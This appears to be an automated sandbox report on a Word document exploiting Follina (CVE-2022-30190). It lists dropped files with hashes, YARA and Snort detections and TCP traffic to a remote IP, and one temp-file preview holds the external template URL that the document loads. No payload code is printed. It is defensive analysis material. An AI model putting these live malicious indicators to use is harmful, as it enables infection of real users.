        Size (bytes):131072
        Entropy (8bit):0.22210892012795055
        Encrypted:false
        SSDEEP:48:I3Sg3UrBjpzyF2ChhvPiRE0O3CFTAtkhDvLtM7JOeM7JO2:Kz3CjRydhAE0WkvXtoJOeoJO2
        MD5:72A9F24FA21B0038AEB713CB6120691A
        SHA1:E5E04F213DC78D81E20E38828257809FDD6C2847
        SHA-256:BB1CF9146FDE49E20F49A3675C0F40D73A50FE382E1CD803238424CAA80C3CB9
        SHA-512:1C15DB398DC9659CADC1845A07BBFA26968E68A39734C4B38C4E27ABBC21A0246ABAA44625817952389F531899A632F8AACF809F62CD2E870D3F87E97CEC86E5
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z.=^:j]tM....L..5S,...X.F...Fa.q..............................r'.s.J..Q..!............8(..H.6).W...P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.901668435580097
        Encrypted:false
        SSDEEP:3:yVlgsRlz2bzGhkIe3kdV6s8TOaXOHYlLlZ276:yPblzCKne3kqs8TFeHYDZ22
        MD5:85FE3E54F9BEAA55887F2553E20757A4
        SHA1:C04256BDD0C66CCB3588A9CA31C81AEF0B9D8B3A
        SHA-256:4B0C62EFA9EA80AE96E1F0703705400E339A590368747C89738A60940EFC2B95
        SHA-512:9349BA612345F1CA913C7F1EF613FA10EEC8A5ADF90C4A1B6802B20FB9B725202DCF4F7E5BCC00FD7541D1EC170BD124B5AE9362F1AB7531A6EBB63FE4C1532B
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.D.A.A.E.A.1.D.B.-.A.9.D.3.-.4.B.C.E.-.A.0.0.E.-.2.4.1.7.1.7.F.E.4.2.1.B.}...F.S.D..

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):162
        Entropy (8bit):4.43530643106624
        Encrypted:false
        SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
        MD5:4F8E702CC244EC5D4DE32740C0ECBD97
        SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
        SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
        SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
        Malicious:false
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:moderate, very likely benign file
        Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\t[1].htm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines (4518)
        Category:dropped
        Size (bytes):6336
        Entropy (8bit):5.021080934873899
        Encrypted:false
        SSDEEP:192:/KiSe+1GPw6utZ7UPg9N2EFWeBKBZOJiQjtz:5U7/UPgP2Eb6IJZ
        MD5:12B73F8BAE89EB92C8CDA74269C2F69F
        SHA1:EF4647A4DA8B76494E9F5CCC105D034134EBB419
        SHA-256:5AB0198CE6E52F0691A5424278A549E5D4257BCD67735AD5EC2D2B273E6E6400
        SHA-512:D46D68E4AB253AC45046E7549D208B37EDAB31BC975906D7759A4DDEA7F2209C487E15CDC6C622785F0011A8DFBACBF3E7BFEA95585A20611C75D23472CCC536
        Malicious:false
        Reputation:low
        Preview:<!doctype html>.<html lang="en">.<head>.<title>.Basic HTML Template.</title>.</head>.<body>...<p>.Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus...Morbi convallis get rekt m8, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\t[1].htm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):162
        Entropy (8bit):4.43530643106624
        Encrypted:false
        SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
        MD5:4F8E702CC244EC5D4DE32740C0ECBD97
        SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
        SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
        SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
        Malicious:false
        Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines (4518)
        Category:dropped
        Size (bytes):6336
        Entropy (8bit):5.021080934873899
        Encrypted:false
        SSDEEP:192:/KiSe+1GPw6utZ7UPg9N2EFWeBKBZOJiQjtz:5U7/UPgP2Eb6IJZ
        MD5:12B73F8BAE89EB92C8CDA74269C2F69F
        SHA1:EF4647A4DA8B76494E9F5CCC105D034134EBB419
        SHA-256:5AB0198CE6E52F0691A5424278A549E5D4257BCD67735AD5EC2D2B273E6E6400
        SHA-512:D46D68E4AB253AC45046E7549D208B37EDAB31BC975906D7759A4DDEA7F2209C487E15CDC6C622785F0011A8DFBACBF3E7BFEA95585A20611C75D23472CCC536
        Malicious:true
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Preview:<!doctype html>.<html lang="en">.<head>.<title>.Basic HTML Template.</title>.</head>.<body>...<p>.Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus...Morbi convallis get rekt m8, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines (4518)
        Category:dropped
        Size (bytes):6336
        Entropy (8bit):5.021080934873899
        Encrypted:false
        SSDEEP:192:/KiSe+1GPw6utZ7UPg9N2EFWeBKBZOJiQjtz:5U7/UPgP2Eb6IJZ
        MD5:12B73F8BAE89EB92C8CDA74269C2F69F
        SHA1:EF4647A4DA8B76494E9F5CCC105D034134EBB419
        SHA-256:5AB0198CE6E52F0691A5424278A549E5D4257BCD67735AD5EC2D2B273E6E6400
        SHA-512:D46D68E4AB253AC45046E7549D208B37EDAB31BC975906D7759A4DDEA7F2209C487E15CDC6C622785F0011A8DFBACBF3E7BFEA95585A20611C75D23472CCC536
        Malicious:true
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Preview:<!doctype html>.<html lang="en">.<head>.<title>.Basic HTML Template.</title>.</head>.<body>...<p>.Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus...Morbi convallis get rekt m8, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):5632
        Entropy (8bit):2.0883867069142816
        Encrypted:false
        SSDEEP:24:ruNK//zjb7FwNYg1Ky1KqiDE2/8u2oUFwNYg1Kg1KqZi7:ru4veNYvtqit7v5NYvvqZ
        MD5:590B07601415F1D20B9D8DF1F3290207
        SHA1:385D509E9B8B490D23927752A84CF9BCE328B017
        SHA-256:584220FA7DF12F57A3EE4E5602DD11ACA994B8BB3EF46FA819D258908691C9A3
        SHA-512:DD6CCE4121F0E0137440DEEBF52D4D7CC9A48B118C75A13A7C17765E52B494EDFE64B2B8B9F280E63411421E43C8016130F95307E02A752D3B368A242042F779
        Malicious:false
        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{611D617C-89DE-47F7-979F-596893CFACC4}.tmp

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1536
        Entropy (8bit):0.8333364598047724
        Encrypted:false
        SSDEEP:6:olgI5lNUJW9/O1KKKWkujJcPYB4PxZUtLimN:4tG1KKltJEZ4
        MD5:C9998821F542F790130D4250654012FE
        SHA1:AB4CA8443BD5535C5C3FB64599299C2635EC394A
        SHA-256:3A6465A9158E9F0B51F150701110F8F9C639494FBA10A19466142AC5E4CDAF76
        SHA-512:FC7FBD1702A707033C5A2C5C2414767F6CC54B3FF7237FC59B314B26F86860247B6C89F6A6A3CE3F1BD0A0CD3D0DF0CE697510C11B97171897D65859CDE19AD5
        Malicious:false
        Preview:..L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.:././.b.a.z.a.-.n.o.v.o.s.t.e.i...n.a.m.e./.d.i.r./.i.n.f.o./.p.r.i.n.y./.t...h.t.m.l.!.". .".". .\.p. .\.f. .0..... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{87D8FFE7-04E6-4C98-8E49-7EEE49FEBDC8}.tmp

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\{1273F576-2E15-4DF7-B230-109720251EE0}

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.025566439551804574
        Encrypted:false
        SSDEEP:6:I3DPcwz9C0/3FvxggLRnW8ctVEz3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPj9CIZLW0zRvYg3J/
        MD5:D8541EE8209C0790C7DB7D752993B728
        SHA1:867905DB02054B4DB2514EBF6F57AE0E8EB345F0
        SHA-256:22BAEA64A5FD08FC1D62B19F72BB8AEABED58A9A89FD57CE84DE2315C33FB6F1
        SHA-512:83624927D95E795EB3AA2F0A6960C588C1E748F78CFC5403BAD9416FA9B5A0D8E18EE70B106B20CC99CB871E16753335DA6CB7671B89944C9B7BBDDD15833E31
        Malicious:false
        Preview:......M.eFy...z(...f.7H....|...S,...X.F...Fa.q............................0....@C....p...........3'....@J.mH0.z.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\{33DCD4F9-2DCF-40AD-ADF2-48E80BE10E8A}

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.025440811431057704
        Encrypted:false
        SSDEEP:6:I3DPcV+w9HvxggLRrgsO+FRXv//4tfnRujlw//+GtluJ/eRuj:I3DPYp9PHTvYg3J/
        MD5:661520ABBD6F539F4F1078C88FBE0FE4
        SHA1:D543A83CCD0CF2C3879F30CD2A632F3502EB2A23
        SHA-256:C920CE90D8D88B9CFDC096072F1102D1EC0C333182EAD1C688B4957CFDEFC83F
        SHA-512:D90AF1C0A98E7FEB19E25E9C92A6C6D8354FADF119370B6F3D5F9B8D66AB404EEDE30EC37C439846F88740F5B41AA98AA3357EBD2CE819C536E16BDF44FB1447
        Malicious:false
        Preview:......M.eFy...z2.q.3.+C.F....e.S,...X.F...Fa.q.............................&...LG.yE...m............{..a@.`..7........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MuUeMZphCk.LNK

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Fri Dec 30 23:38:13 2022, length=11537, window=hide
        Category:dropped
        Size (bytes):1019
        Entropy (8bit):4.548181582713359
        Encrypted:false
        SSDEEP:12:8UN80gXg/XAlCPCHaXNBQtB/SxXX+WcY5itW0juicvbOdllz54qqVmNDtZ3YilMy:85k/XT9SUiZXNeq5zsUDv3q/u7D
        MD5:79E172BFC53379DE07E8580D55EEF81B
        SHA1:CBD123829BA037B2EE561D4CC49DA58767D8ACE8
        SHA-256:48313F54888B36603325A55956DB0E28C92AA56239AF94CC1AFEA91213A23530
        SHA-512:8D2AE4963E0E51ED27890CDB03714DA14DED3EC55C29A2681FE0021CB899B396FD422E2EB7C58884BD10A13F2959E515606197499B81FD1FED2A03279326831B
        Malicious:false
        Preview:L..................F.... .....r..3....r..3..wh4M.5...-...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..-..?V.. .MUUEMZ~1.DOC..L......hT..hT..*...r.....'...............M.u.U.e.M.Z.p.h.C.k...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\MuUeMZphCk.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.u.U.e.M.Z.p.h.C.k...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......405464..........D_....3N...W...9G..N..... .....[D_....3N...W...9G

        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Generic INItialization configuration [misc]
        Category:dropped
        Size (bytes):72
        Entropy (8bit):4.768980259211503
        Encrypted:false
        SSDEEP:3:bDuMJlwQwtV0O9VomxWjDV0O9Vov:bC/59VQD59Vy
        MD5:3B4F0D70AFFDA7569F0C30A6B8CE8437
        SHA1:9D183DF509C1C16E7665DD6D535269D63BF452A1
        SHA-256:CAB652AB0416F9CF4830AB4D0D81FB512466F6C53D2BC46712B4F234BAF85E5A
        SHA-512:1A6384392152B89D0B069E9734C4802A3C7FC776F219F1F23E3A4693FE75FEB09B58A50D72C5D19A47AD246461A9DC5E8AC89357D912EDFBA1355140A541B540
        Malicious:false
        Preview:[folders]..Templates.LNK=0..MuUeMZphCk.LNK=0..[misc]..MuUeMZphCk.LNK=0..

        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
        MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
        SHA1:23684CCAA587C442181A92E722E15A685B2407B1
        SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
        SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

        C:\Users\user\Desktop\~$UeMZphCk.docx

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
        MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
        SHA1:23684CCAA587C442181A92E722E15A685B2407B1
        SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
        SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

        Static File Info

        General

        File type:Microsoft OOXML
        Entropy (8bit):7.711564536070913
        TrID:
        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
        • ZIP compressed archive (8000/1) 7.92%
        File name:MuUeMZphCk.docx
        File size:11537
        MD5:cda4155d33b715f31315a9247d56ed3d
        SHA1:7a495ae1b4c9132d0afb9b058e049cc71c5a5a55
        SHA256:62243a041c28b5f98f0d29780250bf83e61a85523ddce855745f94d381006615
        SHA512:6002e4fc8fab8178f49e30635fb7926326b516f56b3123e9b6e689231c25cb98486ac9367095ea32d45367d74f5401a2ce5ce934f324aa0ef209348e7273dcfc
        SSDEEP:192:bhM1fkUU8hdb8d9264wpl7Z/c+8poF1d3jvvtlhoGheNrGxjPOuaj81s:1mfkz8hdbg92hwRcfa7pr1laGANyxjPK
        TLSH:13325C37852A1C3CD61F4B34E23CC686E49A8647B11BBD9BB60097A2C6C39C82D79F45
        File Content Preview:PK.........A=V...lT... .......[Content_Types].xmlUT....o.c.o.cux................j.0.E.....6.J.(.....e.h...4NDeIh&...8NC)i.M.1.3..3...x].l..m....}....X?+...9.....F.....@1.]_.......c).D.^J.s...!..J.R.._.LF.?...M..+u...rj<.h...Z8.....%I.Pd.mc.U....Z....._)..

        File Icon

        Icon Hash:e4e6a2a2a4b4b4a4

        Network Behavior

        Snort IDS Alerts

        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        195.201.110.47192.168.2.22443491762036726 01/30/23-16:38:59.237228TCP2036726ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)44349176195.201.110.47192.168.2.22

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Jan 30, 2023 16:38:53.394267082 CET4917180192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:53.417531967 CET8049171195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:53.417711973 CET4917180192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:53.417987108 CET4917180192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:53.441041946 CET8049171195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:53.441082954 CET8049171195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:53.441215992 CET4917180192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:54.687328100 CET4917280192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:54.710592031 CET8049172195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:54.710834980 CET4917280192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:54.711050987 CET4917280192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:54.734273911 CET8049172195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:54.734345913 CET8049172195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:54.735491037 CET49173443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:54.735562086 CET44349173195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:54.735647917 CET49173443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:54.747786045 CET49173443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:54.747834921 CET44349173195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:54.852899075 CET44349173195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:54.853111029 CET49173443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:54.864320993 CET49173443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:54.864340067 CET44349173195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:54.864917040 CET44349173195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:54.939670086 CET4917280192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:54.957336903 CET8049172195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:54.957565069 CET4917280192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:55.070719957 CET44349173195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:55.070919991 CET49173443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:55.119185925 CET49173443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:55.119219065 CET44349173195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:55.142942905 CET44349173195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:55.143026114 CET44349173195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:55.143157005 CET49173443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:55.143218994 CET49173443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:55.143240929 CET44349173195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:58.790441036 CET4917480192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:58.813038111 CET8049174195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:58.813203096 CET4917480192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:58.813340902 CET4917480192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:58.836319923 CET8049174195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:58.836354017 CET8049174195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:58.836942911 CET49175443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:58.836999893 CET44349175195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:58.837066889 CET49175443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:58.838871956 CET49175443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:58.838891983 CET44349175195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:58.902235031 CET44349175195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:58.902399063 CET49175443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:58.914844036 CET49175443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:58.914865017 CET44349175195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:58.915324926 CET44349175195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:58.952275038 CET49175443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:58.952305079 CET44349175195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.003062010 CET44349175195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.003206968 CET44349175195.201.110.47192.168.2.22
        Jan 30, 2023 16:38:59.003424883 CET49175443192.168.2.22195.201.110.47
        Jan 30, 2023 16:38:59.003900051 CET49175443192.168.2.22195.201.110.47
